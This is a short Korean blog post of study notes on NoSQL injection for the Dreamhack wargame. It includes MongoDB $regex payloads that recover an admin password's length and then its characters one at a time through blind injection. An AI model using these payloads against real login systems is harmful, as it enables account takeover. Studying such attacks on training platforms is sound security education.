드림핵
Dreamhack NoSQL
NOT Only SQL
SQL을 사용하지 않고, 이에 따라 RDBMS와는 달리 복잡하지 않은 데이터를 저장해 단순 검색 및 추가 검색 작업을 위해 매우 최적화된 저장 공간
- MongoDB
- Redis
- CouchDB
https://learn.dreamhack.io/168#6
연산자, 문법 참고
MongoDB은 자료형으로 문자열, 정수, 날짜, 실수뿐만 아니라 오브젝트, 배열 타입을 사용
NoSQL Injection 취약점은 주로 이용자의 입력 값에 대한 타입 검증이 불충분할 때 발생
예를 들어, 사용자의 입력 값에 대해 타입을 검증하지 않는다면 오브젝트 타입의 값을 입력, 이를 통해 연산자를 사용하여 공격자는 계정 정보를 탈취 가능
https://learn.dreamhack.io/189#11
로그인 | Dreamhack
dreamhack.io
Blind Nosql Injection
$regex 지정된 정규식과 일치하는 데이터를 조회
. 임의의 한 문자, .{3} 3문자로만 되어 있는 문자열
길이 파악
{"uid": "admin", "upw": {"$regex":".{5}"}}
{"uid": "admin", "upw": {"$regex":".{6}"}}
^는 입력의 시작 부분을 의미
한 글자씩 비교
{"uid": "admin", "upw": {"$regex":"^a"}}
{"uid": "admin", "upw": {"$regex":"^aa"}}
{"uid": "admin", "upw": {"$regex":"^ab"}}
…
{"uid": "admin", "upw": {"$regex":"^apple"}}
'Wargame > dreamhack' 카테고리의 다른 글
| command-injection-1 (0) | 2023.10.03 |
|---|---|
| MANGO (0) | 2023.10.03 |
| simple_sqli (0) | 2023.10.03 |
| XSS-1 (0) | 2023.10.03 |
| Cookie (0) | 2023.10.03 |